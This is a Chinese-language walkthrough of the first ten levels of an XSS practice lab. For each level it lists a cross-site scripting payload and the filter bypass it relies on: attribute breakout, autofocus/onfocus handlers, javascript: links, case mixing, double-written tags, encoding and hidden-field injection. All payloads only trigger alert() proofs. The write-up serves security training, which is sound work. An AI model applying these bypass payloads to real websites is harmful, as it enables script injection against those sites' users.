XSS-libs
第一关
payload:<script>alert(1)</script>

第二关
payload:"><script>alert(1)</script>
输入普通的payload

查看源码

发现<>被编码了 尝试将value前的input进行包裹 使用"><script>alert(1)</script>

第三关
payload: 1' autofocus onfocus=alert(1) x="

先输入<script>alert(1)</script>

查看源码

发现尖括号被编码了 使用1' autofocus onfocus=alert(1) x="绕过

第四关
payload:1" autofocus onfocus=alert(1) x="
输入<script>alert(1)</script>

发现尖括号被过滤了

还是构造标签绕过 1" autofocus onfocus=alert(1) x="

第五关
payload:"> <a href="javascript:alert('xss')">
使用"><script>alert(1)<script>

查看源码 发现第一个script中间加了一个_

尝试1" autofocus onfocus=alert(1) x=" 发现on中间加了一个_

使用不带on的语句"> <a href="javascript:alert('xss')">

第六关
payload"><SCript>alert(1)</script>

使用script

查看源码
发现第一个script还是中间加了_
尝试大小写绕过

第七关
payload:"><ScrSCRIPtipt>alert(1)</sCRscripTIPT>

查看源码

双写绕过

第八关
payload:
javascript:alert('xss')

查看源码

这关将" script on 给绕过了 使用16进制ascii编码绕过

第九关
payload:
javascript:alert('http://xss')

查看源码

在href标签中插入JavaScript

这里猜测可能是输入的内容必须要带链接 这边随机加一个链接上去

发现script中间插入了一个_ 这里想到的就是编码 而且链接必须得带http https不行
最后使用payload成功弹窗

第十关
payload:t_link=&t_history=&t_sort=" onclick="alert(1)" type=""

查看源码

发现<><>被编码了 而且 多了三个input标签
尝试对每个input标签插入script语句

发现t_sort中value值有回显
对t_sort进行构造t_link=&t_history=&t_sort=" onclick="alert(1)" type=""
